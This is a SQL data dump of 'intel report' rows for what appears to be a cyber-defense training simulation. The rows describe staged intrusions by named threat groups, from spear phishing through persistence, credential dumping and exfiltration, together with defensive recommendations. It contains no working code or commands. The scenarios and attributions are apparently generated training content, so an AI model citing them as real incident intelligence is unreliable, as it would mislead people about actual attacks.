(54, 11, 341, 3, 'Lateral Movement Activity Observed', '### Overview\nCredential harvesting has led to lateral movement through SMB protocol, indicating an attempt to propagate within the network.\n\n### Details\n- **Protocol Used**: SMB (Server Message Block)\n- **Objective**: Gain access to additional systems using harvested credentials.\n- **Indicators**: Unusual login attempts across network nodes.\n\n### Next Steps\nPrepare for potential reconnaissance activities by the attackers, as they seek to map the network and identify valuable data.', '2026-01-03 00:04:00'),
(55, 11, 342, 4, 'Reconnaissance Activity Detected', '### Overview\nFollowing lateral movement, attackers are executing reconnaissance commands to gather information about the network.\n\n### Details\n- **Commands Used**: Network mapping tools, system enumeration commands.\n- **Purpose**: Identify critical systems and data of interest.\n- **Indicators**: Unusual network scans and command executions.\n\n### Next Steps\nAnticipate data collection attempts for exfiltration. Implement monitoring to detect unusual data access patterns.', '2026-01-03 00:04:00'),
(56, 11, 343, 5, 'Data Collection Identified', '### Overview\nReconnaissance has led to data collection activities, likely preparing for exfiltration.\n\n### Details\n- **Activity**: Access and aggregation of sensitive data.\n- **Objective**: Prepare data for exfiltration.\n- **Indicators**: Large data access events, unusual file movements.\n\n### Next Steps\nExpect attempts to exfiltrate data via HTTP POST or other channels. Enhance monitoring on outbound traffic.', '2026-01-03 00:04:00'),
(57, 11, 344, 6, 'Data Exfiltration Attempt Detected', '### Overview\nData exfiltration is underway, with attackers using HTTP POST requests to transmit collected data.\n\n### Details\n- **Method**: HTTP POST\n- **Target**: External servers\n- **Indicators**: Unusual outbound traffic patterns, large amounts of data being sent out.\n\n### Next Steps\nPrepare for potential cleanup operations by attackers. Strengthen defenses to prevent further exfiltration and identify any remaining web shells or backdoors.', '2026-01-03 00:04:00'),
(58, 11, 345, 7, 'Defense Evasion Activity Noted', '### Overview\nAttackers are attempting to clean up and remove indicators of their presence to evade detection.\n\n### Details\n- **Activities**: Deleting logs, removing malware traces, altering system settings.\n- **Objective**: Obfuscate attack traces and maintain persistence.\n- **Indicators**: Missing logs, altered system configurations.\n\n### Next Steps\nConduct a thorough forensic analysis to recover deleted logs and identify any remaining indicators. Implement stronger endpoint monitoring to detect future attempts.', '2026-01-03 00:04:00'),
(59, 11, 346, 8, NULL, NULL, '2026-01-03 00:04:00'),
(60, 12, 347, 1, 'Analysis of Initial Access via Spear Phishing', '# Initial Access via Spear Phishing\n\n## Summary\nFollowing the detection of spear phishing attempts, analysis of intercepted emails reveals the use of legitimate-looking diplomatic communications as a lure. The phishing emails were tailored to the targeted individuals using publicly available information.\n\n## Details\n- **Sender**: The emails appear to originate from trusted diplomatic entities.\n- **Payload**: The emails contain malicious attachments that exploit vulnerabilities in document readers.\n- **Target**: Individuals within diplomatic networks.\n\n## Next Steps\nThe successful spear phishing attack sets the stage for the execution of a Remote Access Tool (RAT), which is likely the next step in the adversary\'s playbook.\n\n## Recommendations\n- Increase awareness and training for diplomatic personnel regarding spear phishing tactics.\n- Implement email filtering and sandboxing solutions to detect and block malicious attachments.', '2026-01-03 00:37:55'),
(61, 12, 348, 2, 'Execution of Remote Access Tool (RAT) Analysis', '# Execution of Remote Access Tool\n\n## Summary\nAfter gaining initial access, the adversaries executed a Remote Access Tool (RAT) on compromised systems. This RAT allows them to remotely control the infected machines and facilitates further exploitation.\n\n## Details\n- **RAT Capabilities**: File transfer, command execution, and keylogging.\n- **Persistence**: The RAT is configured to start at system boot, ensuring continuous access.\n- **Communication**: The tool communicates with command and control (C2) servers using encrypted channels to evade detection.\n\n## Next Steps\nDeployment of a rootkit is anticipated to establish deeper persistence and stealth, likely the next phase in the attack.\n\n## Recommendations\n- Monitor network traffic for anomalous connections to known or suspected C2 domains.\n- Conduct thorough endpoint scans to identify and neutralize the RAT.', '2026-01-03 00:37:55'),
(62, 12, 349, 3, 'Rootkit Deployment and Persistence Mechanism', '# Rootkit Deployment for Persistence\n\n## Summary\nThe adversaries have deployed a sophisticated rootkit to ensure persistent access to compromised systems. This rootkit is designed to operate silently and evade detection by traditional security tools.\n\n## Details\n- **Rootkit Features**: Kernel-level access, anti-debugging techniques, and hidden file storage.\n- **Impact**: The rootkit grants long-term control over the system and masks malicious activities.\n- **Detection**: Difficult to detect without specialized tools due to its deep integration.\n\n## Next Steps\nWith rootkit persistence established, the attackers are likely to move laterally within the network, exploiting hijacked credentials to expand their reach.\n\n## Recommendations\n- Deploy advanced endpoint detection and response (EDR) solutions to identify unusual behavior.\n- Perform regular integrity checks of system files and settings.', '2026-01-03 00:37:55'),
(63, 12, 350, 4, 'Lateral Movement and Credential Access', '# Lateral Movement via Hijacked Credentials\n\n## Summary\nUtilizing hijacked credentials, the adversaries are expanding their presence across the network. This lateral movement allows them to access additional systems and data.\n\n## Details\n- **Credential Theft**: Credentials were harvested using keyloggers and memory scraping techniques.\n- **Access Points**: Compromised accounts are used to access shared drives, email servers, and other critical systems.\n- **Objective**: Broader network infiltration to locate valuable intelligence.\n\n## Next Steps\nThe adversaries will likely use hijacked satellite links to exfiltrate sensitive data, masking their C2 locations and avoiding detection.\n\n## Recommendations\n- Implement multi-factor authentication (MFA) to reduce the risk of credential misuse.\n- Monitor for unusual login patterns and access attempts to critical systems.', '2026-01-03 00:37:55'),
(64, 12, 351, 5, NULL, NULL, '2026-01-03 00:37:55'),
(65, 13, 352, 1, 'Analysis of Initial Network Breach', '### Summary\nFollowing the alert on suspicious access to the university network, further investigation has revealed that APT40 utilized spear-phishing emails to target university staff, leading to credential theft. These credentials were then used to access the university\'s internal network.\n\n### Detailed Findings\n- **Phishing Campaign**: APT40 crafted emails with attachments masquerading as legitimate maritime research documents, luring victims into opening them.\n- **Credential Harvesting**: Upon opening, malicious scripts captured login credentials, which were then used in lateral movement attempts.\n\n### Next Steps\nMonitor for signs of malware execution, as this is the typical progression post-initial access in APT40 operations.', '2026-01-03 00:42:39'),
(66, 13, 353, 2, 'Detection of Custom Malware Execution', '### Summary\nSubsequent to the initial breach, custom malware was detected executing within the compromised network. This malware is designed to blend with legitimate maritime research applications, making detection challenging.\n\n### Malware Profile\n- **Custom Build**: The malware shows characteristics unique to APT40, including obfuscated code and modular functionality.\n- **Capabilities**: It can execute commands, capture keystrokes, and exfiltrate data.\n\n### Recommendations\n- **Increased Monitoring**: Implement advanced monitoring for web shell installations as APT40 typically progresses to establishing persistence following malware execution.', '2026-01-03 00:42:39'),
(67, 13, 354, 3, 'Establishing Persistence via Web Shell', '### Summary\nAPT40 has been observed deploying web shells to maintain persistence within the compromised university network. These web shells provide ongoing access even if the initial breach is discovered and remediated.\n\n### Web Shell Indicators\n- **File Names and Locations**: Web shells are hidden within legitimate directories under misleading names.\n- **Command and Control**: Use of HTTP/S protocols to communicate with external servers.\n\n### Countermeasures\n- **File Integrity Monitoring**: Deploy monitoring solutions to detect unauthorized file changes or additions.\n- **Network Traffic Analysis**: Watch for anomalous outbound traffic indicative of data staging or exfiltration.', '2026-01-03 00:42:39'),
(68, 13, 355, 4, 'Lateral Movement to Secure Data Sources', '### Summary\nAPT40 has successfully moved laterally within the network, gaining access to secure data sources including databases containing sensitive maritime research.\n\n### Lateral Movement Tactics\n- **Credential Stuffing**: Utilization of harvested credentials to access different network segments.\n- **Remote Desktop Protocol (RDP)**: Exploiting RDP to move between systems and access secured data.\n\n### Next Steps\nPrepare for potential data exfiltration activities by analyzing network logs for large outbound data transfers, especially focusing on sonar technology schematics.', '2026-01-03 00:42:39'),
(69, 13, 356, 5, NULL, NULL, '2026-01-03 00:42:39'),
(70, 14, 357, 1, 'Analysis of Initial Compromise Vector', '### Overview\nFollowing the detection of suspicious web traffic attributed to a drive-by download, further analysis reveals the presence of a malicious downloader script embedded within a compromised website. This script is responsible for initiating the subsequent malicious activities.\n\n### Technical Details\n- **Infection Vector**: Compromised website hosting a malicious JavaScript file.\n- **Observed Behavior**: The script attempts to download and execute a secondary payload, likely a PowerShell script.\n\n### Next Steps\nMonitor for execution of PowerShell scripts, which may indicate the deployment of additional malware components or the initiation of further malicious actions.', '2026-01-03 00:50:36'),
(71, 14, 358, 2, 'PowerShell Script Analysis', '### Overview\nAfter the execution of a malicious PowerShell script, an in-depth investigation reveals its purpose in establishing persistence and facilitating further attacks.\n\n### Technical Details\n- **Script Functionality**: The script modifies registry keys to ensure the persistence of malware across system reboots.\n- **Indicators of Compromise**: Registry modifications detected in `HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run`.\n\n### Next Steps\nMonitor registry activity for additional modifications and prepare for potential credential theft attempts.', '2026-01-03 00:50:36'),
(72, 14, 359, 3, 'Persistence Mechanism and Impact', '### Overview\nThe persistence mechanism has been successfully established via registry modifications, allowing the malicious payload to survive system restarts.\n\n### Technical Details\n- **Impact**: Ensures the continued operation of malicious processes.\n- **Associated Risks**: Increased likelihood of credential dumping tools being deployed to harvest sensitive information.\n\n### Next Steps\nInitiate enhanced monitoring for credential theft activities, such as the use of Mimikatz or similar tools.', '2026-01-03 00:50:36'),
(73, 14, 360, 4, 'Credential Dumping Detection and Mitigation', '### Overview\nThe detection of credential dumping attempts using Mimikatz indicates an escalation in the attack, with the adversary aiming to harvest user credentials.\n\n### Technical Details\n- **Detected Activity**: Execution of Mimikatz binary or similar tools.\n- **Potential Exposure**: Compromise of user and administrative credentials.\n\n### Mitigation Steps\nImmediately rotate all credentials identified as potentially compromised and enforce multi-factor authentication (MFA) across the network.', '2026-01-03 00:50:36'),
(74, 14, 361, 5, 'Suspicious File Transfer Analysis', '### Overview\nSuspicious file transfers over SMB traffic have been detected, potentially indicating lateral movement or exfiltration activities.\n\n### Technical Details\n- **Observed Traffic**: Unusual SMB connections and file transfer patterns.\n- **Potential Objectives**: Data staging for exfiltration or deployment of ransomware payloads.\n\n### Next Steps\nIsolate affected systems and review transferred files for signs of ransomware payloads or sensitive data.', '2026-01-03 00:50:36'),
(75, 14, 362, 6, 'Data Encryption Activity and Ransom Note', '### Overview\nActive ransomware encryption processes have been detected, indicating the adversary\'s final objective to encrypt and hold data for ransom.\n\n### Technical Details\n- **Encryption Process**: Rapid file encryption observed across multiple directories.\n- **Ransom Note**: A note demanding payment in cryptocurrency for decryption keys has been identified.\n\n### Response Actions\nInitiate incident response protocols to contain the spread of encryption, engage in negotiation simulations, and explore decryption options without payment.', '2026-01-03 00:50:36'),
(76, 14, 363, 7, NULL, NULL, '2026-01-03 00:50:36'),
(77, 15, 364, 1, 'Analysis of Anomalous PowerShell Activity', '### Overview\nFollowing the detection of a suspicious web shell on the IIS server, further investigation has revealed anomalous PowerShell activities. These activities indicate that the attacker may be attempting to execute scripts remotely to escalate their privileges or install additional payloads.\n\n### Key Indicators\n- **PowerShell Execution Logs**: Multiple instances of PowerShell command execution were logged, originating from the compromised server.\n- **Obfuscation Techniques**: The commands were heavily obfuscated, a common technique used to evade detection.\n\n### Recommendations\n- **Immediate Review**: Conduct a thorough review of PowerShell logs across all servers.\n- **Restrict PowerShell Usage**: Implement restrictive policies to limit PowerShell script execution to trusted users only.', '2026-01-03 00:54:31'),
(78, 15, 365, 2, 'Discovery of Hidden Scheduled Task', '### Overview\nAfter observing anomalous PowerShell activity, a hidden scheduled task was discovered on the compromised server. This task is likely set up to ensure the attacker maintains persistence within the network.\n\n### Details\n- **Task Name**: The task was found under a misleading name resembling a legitimate system update.\n- **Execution Timing**: Scheduled to execute during off-peak hours to avoid detection.\n\n### Recommendations\n- **Task Audit**: Conduct a comprehensive audit of scheduled tasks on all critical systems.\n- **Security Policies**: Strengthen policies to alert on the creation of new scheduled tasks without proper authorization.', '2026-01-03 00:54:31');
INSERT INTO `operation_alerts` (`id`, `operation_id`, `alert_id`, `sequence_order`, `intel_report_title`, `intel_report_content`, `created_at`) VALUES
(79, 15, 366, 3, 'Unauthorized Network Map Access Detected', '### Overview\nThe creation of a hidden scheduled task led to an incident where unauthorized access to the telecom network map was detected. This access suggests the attacker is preparing for lateral movement within the network.\n\n### Indicators\n- **Access Logs**: The logs show access by an unauthorized user account, possibly compromised through credential theft.\n- **Network Map Utility**: The access was directed at a utility used specifically by network engineers.\n\n### Recommendations\n- **Account Review**: Immediately review access permissions and enforce multi-factor authentication for all sensitive accounts.\n- **Monitor Tools**: Increase monitoring on network management tools to detect unusual access patterns.', '2026-01-03 00:54:31'),
(80, 15, 367, 4, 'Exfiltration of Call Detail Records', '### Overview\nThe final stage of the intrusion was marked by the exfiltration of call detail records (CDRs), confirming the adversary\'s objective.\n\n### Exfiltration Details\n- **Data Transfer**: Significant outbound data transfers were recorded, consistent with the volume of CDRs.\n- **Destination IP**: Transfers were directed towards an external server that has been linked to previous Gallium APT activities.\n\n### Recommendations\n- **Data Loss Prevention**: Implement DLP solutions to monitor and block unauthorized data transfers.\n- **Incident Response**: Initiate a full incident response procedure to assess the extent of the breach and remediate affected systems.', '2026-01-03 00:54:31'),
(81, 15, 368, 5, NULL, NULL, '2026-01-03 00:54:31'),
(82, 16, 369, 1, NULL, NULL, '2026-01-03 23:52:02'),
(83, 16, 370, 2, 'Macro Execution Insight', '### Context:\nUpon the detection of a suspicious macro-enabled document, further investigation revealed that the document contained obfuscated macro code designed to execute a malicious script. This script initiates the download of additional payloads, leading to the execution phase.\n\n### Next Steps:\nMonitor for unusual script executions and network traffic indicative of further payload downloads.', '2026-01-03 23:52:02'),
(84, 16, 371, 3, 'POWERSTATS Backdoor Analysis', '### Context:\nThe malicious script executed by the macro has installed the POWERSTATS backdoor, which is known for persistence mechanisms that allow attackers to maintain access to the system. This backdoor is commonly used by MuddyWater for further command execution and data exfiltration.\n\n### Next Steps:\nEnsure endpoint detection systems are updated to identify and block POWERSTATS activity.', '2026-01-03 23:52:02'),
(85, 16, 372, 4, 'C2 Communication Detected', '### Context:\nEncrypted communications have been detected with a known MuddyWater command and control (C2) server. This indicates active C2 communication, allowing for remote control and data exfiltration.\n\n### Next Steps:\nIsolate the infected systems to prevent further C2 interactions and gather network traffic logs for analysis.', '2026-01-03 23:52:02'),
(86, 16, 373, 5, 'Lateral Movement Patterns', '### Context:\nThere has been an attempt to move laterally across the network, likely using compromised credentials and exploiting network shares. This movement aims to expand the attack footprint within the agency\'s infrastructure.\n\n### Next Steps:\nConduct a thorough investigation of access logs and isolate affected network segments to prevent further lateral movement.', '2026-01-03 23:52:02'),
(87, 16, 374, 6, 'Credential Dumping Tactics', '### Context:\nCredential dumping activities have been identified, suggesting the use of tools like Mimikatz. This is a precursor for lateral movement and privilege escalation within the network.\n\n### Next Steps:\nInitiate a password reset for potentially compromised accounts and enhance monitoring for atypical login attempts.', '2026-01-03 23:52:02'),
(88, 16, 375, 7, 'Exfiltration Activity Alert', '### Context:\nFile transfer activities to an external server have been detected, indicating potential data exfiltration efforts by the attackers. This is a critical phase of the attack lifecycle.\n\n### Next Steps:\nBlock outbound connections to the identified external IPs and assess the types of data potentially exfiltrated.', '2026-01-03 23:52:02'),
(89, 16, 376, 8, 'Wiper Logic Activation', '### Context:\nThe execution of wiper logic has been detected, signaling the attacker\'s intent to destroy data and disrupt operations under the guise of ransomware.\n\n### Next Steps:\nInitiate backup restoration procedures and ensure data integrity checks are performed to verify the completeness of recovered data.', '2026-01-03 23:52:02'),
(90, 16, 377, 9, 'Forensic Artifact Analysis', '### Context:\nForensic artifact recovery has begun to understand the attack vector and methods used by MuddyWater. This is crucial for identifying weaknesses and preventing future attacks.\n\n### Next Steps:\nCollaborate with forensic experts to analyze recovered artifacts and compile an incident report for strategic improvements.', '2026-01-03 23:52:02'),
(91, 16, 378, 10, 'Mitigation and Remediation Summary', '### Context:\nComprehensive mitigation and remediation measures have been implemented, focusing on patching vulnerabilities, enhancing monitoring, and reinforcing security protocols.\n\n### Next Steps:\nConduct a post-incident review to evaluate the effectiveness of response actions and update security policies accordingly.', '2026-01-03 23:52:02'),
(92, 17, 379, 1, 'Analysis of Malicious Payload Execution', '# Analysis of Malicious Payload Execution\n\nFollowing the detection of a phishing email, a detailed investigation has identified the execution of a malicious payload on the target system. This payload, typically a Remote Access Trojan (RAT), allows the attacker to gain control over the infected system.\n\n## Key Findings:\n- **Payload Type:** The executed payload is consistent with APT1\'s known use of RATs to establish remote access.\n- **Execution Method:** The payload was executed via a script embedded in a seemingly benign document delivered through the phishing email.\n- **Next Steps:** Close monitoring is required to detect any persistence mechanisms that may be established by the attacker to maintain access.', '2026-01-04 00:59:40'),
(93, 17, 380, 2, 'Insight into Persistence Mechanisms', '# Insight into Persistence Mechanisms\n\nAfter executing the malicious payload, the attacker has likely installed a persistence mechanism to ensure continued access to the compromised system.\n\n## Key Techniques:\n- **Registry Modifications:** Changes to the system registry to enable the payload to execute upon system startup.\n- **Scheduled Tasks:** Creation of scheduled tasks that regularly trigger the payload.\n- **Service Creation:** Establishment of new services that run the malicious code in the background.\n\n## Implications:\nThe presence of these mechanisms suggests a strategic attempt to maintain long-term access. Monitoring for credential dumping is advised as the next phase in the attack lifecycle.', '2026-01-04 00:59:40'),
(94, 17, 381, 3, 'Credential Dumping Activity Overview', '# Credential Dumping Activity Overview\n\nThe persistence mechanisms have paved the way for the attacker to perform credential dumping, a technique used to extract user credentials from the compromised system.\n\n## Techniques Observed:\n- **LSASS Memory Dumping:** Access to Local Security Authority Subsystem Service (LSASS) memory to extract credentials.\n- **SAM Database Extraction:** Copying the Security Account Manager (SAM) database for offline analysis.\n- **Tools Used:** Use of known tools like Mimikatz to facilitate credential dumping.\n\n## Recommendations:\nImmediate action is required to prevent lateral movement within the network. Look out for data exfiltration attempts as potential next steps.', '2026-01-04 00:59:40'),
(95, 17, 382, 4, 'Data Exfiltration Attempt Analysis', '# Data Exfiltration Attempt Analysis\n\nFollowing credential dumping, the attacker has attempted to exfiltrate data from the target network.\n\n## Exfiltration Methods:\n- **Encrypted Channels:** Use of encrypted channels (e.g., HTTPS, VPN) to hide data transfer.\n- **Cloud Services:** Leveraging cloud storage services to exfiltrate data without arousing suspicion.\n- **FTP/SFTP:** Use of file transfer protocols to move data out of the network.\n\n## Detected Indicators:\n- Sudden spikes in outbound traffic.\n- Unusual access to cloud storage services.\n\n## Conclusion:\nThe detected data exfiltration attempt underscores the need for enhanced monitoring and response protocols to mitigate data loss and further unauthorized access.', '2026-01-04 00:59:40'),
(96, 17, 383, 5, NULL, NULL, '2026-01-04 00:59:40'),
(97, 18, 384, 1, 'Investigation of Spear Phishing Email', '### Overview\nThe initial access vector was identified as a spear phishing email targeting key personnel within the organization. The email contained a seemingly legitimate attachment that, once opened, executed a hidden script.\n\n### Analysis\n- **Sender:** The email originated from a spoofed address resembling a trusted partner.\n- **Content:** The attachment was a weaponized document with macros that, when enabled, triggered the download of a malicious payload.\n\n### Next Steps\n- **Immediate Action:** Advise recipients of similar emails to report and delete them without opening.\n- **Preparation for Next Alert:** Monitor systems for signs of script execution and unusual network activity.', '2026-01-04 02:06:57'),
(98, 18, 385, 2, 'Detection of Malicious PowerShell Activity', '### Overview\nFollowing the execution of the spear phishing attack, a malicious PowerShell script was detected. This script is designed to further compromise the network.\n\n### Analysis\n- **Script Functionality:** The script attempts to download additional payloads and establish a connection back to the attacker\'s command and control server.\n- **Indicators of Compromise (IoCs):** Unusual PowerShell commands observed, including obfuscated and encoded scripts.\n\n### Next Steps\n- **Mitigation:** Disable PowerShell scripting for non-administrative users and review execution logs.\n- **Preparation for Next Alert:** Monitor registry changes as the attacker may attempt to establish persistence.', '2026-01-04 02:06:57'),
(99, 18, 386, 3, 'Detection of Registry Modifications', '### Overview\nThe attacker has modified the registry to maintain persistence on targeted systems. This tactic ensures the malicious presence is sustained even after a reboot.\n\n### Analysis\n- **Registry Changes:** Specific keys related to startup and session management have been altered, pointing to unauthorized scripts.\n- **Persistence Mechanism:** Use of Run and RunOnce registry keys to ensure the script executes at startup.\n\n### Next Steps\n- **Immediate Action:** Restore original registry settings and remove unauthorized entries.\n- **Preparation for Next Alert:** Monitor for credential access attempts, which may indicate lateral movement.', '2026-01-04 02:06:57'),
(100, 18, 387, 4, 'Credential Dumping Activity Detected', '### Overview\nThe attacker is attempting lateral movement through credential dumping techniques. This is a critical phase where compromised credentials could lead to further infiltration.\n\n### Analysis\n- **Techniques Used:** Tools like Mimikatz have been detected, indicating attempts to extract credentials from memory.\n- **Targets:** Domain controllers and high-value systems are primary targets for credential harvesting.\n\n### Next Steps\n- **Mitigation:** Isolate affected systems and change all credentials for compromised accounts.\n- **Preparation for Next Alert:** Monitor network for encrypted traffic patterns indicating data exfiltration.', '2026-01-04 02:06:57'),
(101, 18, 388, 5, NULL, NULL, '2026-01-04 02:06:57'),
(102, 19, 389, 1, 'Analysis of APT10\'s Initial Access Techniques', '### Overview\nFollowing the alert of initial access through compromised MSP credentials, further analysis reveals that APT10 leveraged a combination of social engineering and spear-phishing attacks to acquire the necessary credentials. \n\n### Detailed Findings\n- **Phishing Campaign**: Targeted emails were sent to MSP employees, masquerading as official communications.\n- **Credential Harvesting**: APT10 used fake login portals to capture login details.\n\n### Next Steps\nFocus shifts to potential execution methods, with particular attention to DLL side-loading techniques known to be favored by APT10.', '2026-01-04 02:14:19'),
(103, 19, 390, 2, 'APT10\'s Use of DLL Side-Loading for Execution', '### Overview\nPost-execution analysis indicates that APT10 utilized DLL side-loading to run malicious code within trusted applications, bypassing security protocols.\n\n### Detailed Findings\n- **Target Application**: A legitimate aerospace CAD application was identified as the host for the side-loaded DLL.\n- **Malware Characteristics**: The malicious DLL was designed to trigger upon application start-up, ensuring seamless execution.\n\n### Next Steps\nInvestigations will now focus on how persistence is established post-execution, particularly through backdoor implants.', '2026-01-04 02:14:19'),
(104, 19, 391, 3, 'Establishing Persistence: Backdoor Implant Tactics', '### Overview\nAPT10\'s strategy for persistence involves deploying a stealthy backdoor implant that ensures ongoing access to the compromised systems.\n\n### Detailed Findings\n- **Backdoor Implant**: The implant is disguised as a legitimate system process, making detection challenging.\n- **Communication Channels**: The implant communicates with C2 servers using encrypted channels to evade detection.\n\n### Next Steps\nFocus will shift to identifying APT10\'s lateral movement techniques to access critical design servers within the aerospace network.', '2026-01-04 02:14:19'),
(105, 19, 392, 4, 'Lateral Movement: Accessing Design Servers', '### Overview\nAPT10 has successfully moved laterally within the network, reaching sensitive design servers crucial to aerospace projects.\n\n### Detailed Findings\n- **Credential Reuse**: Stolen credentials were used to authenticate with minimal detection.\n- **Network Mapping**: APT10 employed advanced network discovery tools to map the internal network architecture.\n\n### Next Steps\nAttention will now focus on how APT10 collects data from CAD repositories, preparing for exfiltration.', '2026-01-04 02:14:19'),
(106, 19, 393, 5, 'Data Collection from CAD Repositories', '### Overview\nAPT10 has begun the systematic collection of sensitive data from CAD repositories, focusing on proprietary designs and technologies.\n\n### Detailed Findings\n- **Data Targets**: High-value CAD files related to aerospace technologies were prioritized.\n- **Automated Scripts**: Custom scripts were used to streamline the data collection process.\n\n### Next Steps\nThe operation will now monitor the methods APT10 uses to exfiltrate the collected data, emphasizing the use of encrypted channels.', '2026-01-04 02:14:19'),
(107, 19, 394, 6, 'Exfiltration via Encrypted Channels', '### Overview\nAPT10 is in the process of exfiltrating the collected CAD data using encrypted channels to avoid detection by standard security measures.\n\n### Detailed Findings\n- **Encryption Protocols**: Utilized strong encryption to secure data in transit.\n- **Exfiltration Paths**: Data is being sent to overseas servers known to be associated with APT10.\n\n### Next Steps\nThe final phase will assess APT10\'s efforts to clean up and cover their tracks, focusing on defensive evasion techniques.', '2026-01-04 02:14:19'),
(108, 19, 395, 7, NULL, NULL, '2026-01-04 02:14:19'),
(109, 20, 396, 1, 'Execution of Malicious Script - Unlocked', '### Overview\nFollowing the detection of suspicious network activity, further investigation has revealed the execution of a potentially malicious script on multiple network endpoints. The script appears to connect to external command and control (C2) servers, indicating the possibility of an advanced persistent threat (APT) operation.\n\n### Key Findings\n- **Script Origin**: The script was deployed from an external IP address linked to known malicious activity.\n- **C2 Communication**: Established connections with C2 servers observed in previous Whitefly APT campaigns.\n- **Potential Impact**: If left unchecked, the script could allow attackers to execute further malicious activities within the network.\n\n### Recommendations\n- Conduct endpoint analysis to identify all systems affected by the script.\n- Isolate compromised systems to prevent further execution and communication with C2 servers.', '2026-01-04 02:15:53'),
(110, 20, 397, 2, 'Vcrodat Malware Persistence Mechanism - Unlocked', '### Overview\nThe investigation has progressed to identifying the persistence mechanisms employed by the Vcrodat malware identified in the healthcare network. Persistence is a key tactic used by the malware to maintain unauthorized access over an extended period.\n\n### Key Findings\n- **Registry Alterations**: Changes in the system registry to ensure malware execution upon startup.\n- **Scheduled Tasks**: Creation of hidden scheduled tasks to trigger the malware at specific intervals.\n- **System Services**: Manipulation of existing services to load malicious components.\n\n### Recommendations\n- Review and audit system registry and scheduled tasks for unauthorized entries.\n- Implement monitoring of system services to detect anomalies related to persistence mechanisms.', '2026-01-04 02:15:53'),
(111, 20, 398, 3, 'Compromised Open-Source Tool Identified - Unlocked', '### Overview\nDuring the analysis of persistence mechanisms, it was discovered that Whitefly APT has compromised an open-source tool widely used within the organization. This tool has been modified to evade defense mechanisms and facilitate lateral movement.\n\n### Key Findings\n- **Tool Modification**: Alterations to the source code to include backdoor functionality.\n- **Evasion Techniques**: The tool appears benign but contains hidden capabilities to bypass detection.\n- **Impact on Infrastructure**: The tool is deployed across several critical systems, amplifying the threat landscape.\n\n### Recommendations\n- Perform a comprehensive audit of open-source tools and validate their integrity.\n- Educate users on potential risks associated with unverified open-source software.', '2026-01-04 02:15:53'),
(112, 20, 399, 4, 'Unauthorized Credentials Accessed - Unlocked', '### Overview\nThe compromised open-source tool has facilitated unauthorized access to sensitive credentials, enabling lateral movement within the network. This breach exposes critical systems to further exploitation.\n\n### Key Findings\n- **Credential Dumping**: Use of the tool to extract login credentials from memory and secured storage.\n- **Privileged Access**: Attacker gained administrative privileges on several key systems.\n- **Lateral Movement**: Access used to pivot across the network to other high-value targets.\n\n### Recommendations\n- Implement multi-factor authentication to mitigate unauthorized access.\n- Regularly update and change credentials, especially for privileged accounts.', '2026-01-04 02:15:53'),
(113, 20, 400, 5, 'Unusual Data Access Patterns Detected - Unlocked', '### Overview\nA pattern of unusual data access has been identified, indicating potential data collection activities by the threat actor. The access patterns suggest targeted extraction of sensitive information.\n\n### Key Findings\n- **Data Queries**: High-frequency access to patient records and financial data.\n- **Anomalous Behavior**: Access occurring outside normal operating hours and from unexpected locations.\n- **Data Volume**: Significant increase in data retrieval activities, consistent with data staging for exfiltration.\n\n### Recommendations\n- Enhance data access monitoring and alerting capabilities.\n- Conduct data integrity checks to ensure no unauthorized modifications have occurred.', '2026-01-04 02:15:53'),
(114, 20, 401, 6, 'Data Exfiltration Attempt Blocked - Unlocked', '### Overview\nA data exfiltration attempt has been detected and successfully blocked. The perpetrators attempted to transfer sensitive data to external locations using encrypted channels.\n\n### Key Findings\n- **Exfiltration Vector**: Attempts made through secure HTTP channels to obfuscate activities.\n- **Blocked Channels**: Network defenses successfully identified and halted suspicious data transfers.\n- **Threat Actor Tactics**: Use of encryption and compression to mask data exfiltration attempts.\n\n### Recommendations\n- Strengthen perimeter defenses and encryption detection mechanisms.\n- Conduct a full review of attempted exfiltration activities to identify any potential gaps in security.', '2026-01-04 02:15:53'),
(115, 20, 402, 7, NULL, NULL, '2026-01-04 02:15:53'),
(116, 21, 403, 1, 'Analysis of Suspicious Email Attachment', '### Context and Analysis\n\nAfter detecting a suspicious email attachment, it was identified as a malicious document containing macros designed to execute a remote script. This script aims to install a malicious browser extension, providing attackers with a foothold for further operations.\n\n### Recommendations\n- **Immediate Action:** Block and quarantine the email and any similar ones identified in the network.\n- **User Awareness:** Conduct an awareness campaign focusing on recognizing phishing emails and suspicious attachments.\n\n### Next Steps\nMonitoring network traffic for unusual patterns that may indicate the installation of unauthorized browser extensions.', '2026-01-04 02:18:47'),
(117, 21, 404, 2, 'Malicious Browser Extension Installation', '### Context and Analysis\n\nPost-installation of the malicious browser extension, communication with known command and control (C2) servers was observed. The extension is designed to capture user credentials and session cookies, feeding them back to the attackers.\n\n### Recommendations\n- **Immediate Action:** Remove any unauthorized extensions from all systems, and conduct a security review of all browser extensions.\n- **Network Defense:** Implement network monitoring to detect unusual data flows to external servers.\n\n### Next Steps\nInvestigate potential execution of additional payloads, such as BabyShark VBS scripts, from the compromised host.', '2026-01-04 02:18:47'),
(118, 21, 405, 3, 'Execution of BabyShark VBS Script', '### Context and Analysis\n\nThe BabyShark VBS script has been executed, establishing persistence on the compromised systems. This script allows for continuous monitoring and data collection without detection, targeting sensitive information related to nuclear policy.\n\n### Recommendations\n- **Immediate Action:** Isolate affected systems to prevent further spread.\n- **System Hardening:** Review and enhance endpoint security measures to detect VBS script execution.\n\n### Next Steps\nConduct a thorough investigation into unauthorized network access attempts, focusing on lateral movement across the internal network.', '2026-01-04 02:18:47'),
(119, 21, 406, 4, 'Detection of Unauthorized Network Access', '### Context and Analysis\n\nEvidence of lateral movement within the network has been detected. The adversaries are leveraging compromised credentials to access sensitive areas of the network, specifically targeting documents and communications related to nuclear policy.\n\n### Recommendations\n- **Immediate Action:** Revoke compromised credentials and enforce a network-wide password reset.\n- **Network Segmentation:** Implement tighter access controls and segment sensitive data to limit unauthorized access.\n\n### Next Steps\nPrepare for potential data exfiltration attempts by enhancing monitoring of outgoing traffic and securing data transfer protocols.', '2026-01-04 02:18:47'),
(120, 21, 407, 5, NULL, NULL, '2026-01-04 02:18:47'),
(121, 22, 408, 1, 'Analysis of Supply Chain Compromise', '### Overview\nAPT41 has initiated the operation with a sophisticated supply chain attack. This initial access highlights their capability to infiltrate trusted third-party vendors, leveraging them as conduits into the primary target infrastructure. \n\n### Key Indicators\n- **Compromised Vendor**: Evidence suggests a vulnerability in the vendor\'s software update mechanism was exploited.\n- **Payload Delivery**: Malicious payload embedded within legitimate updates.\n\n### Next Steps\nPrepare for potential **Malware Deployment** as the adversary typically uses the established foothold to inject backdoor malware into the compromised systems.', '2026-01-04 02:21:52'),
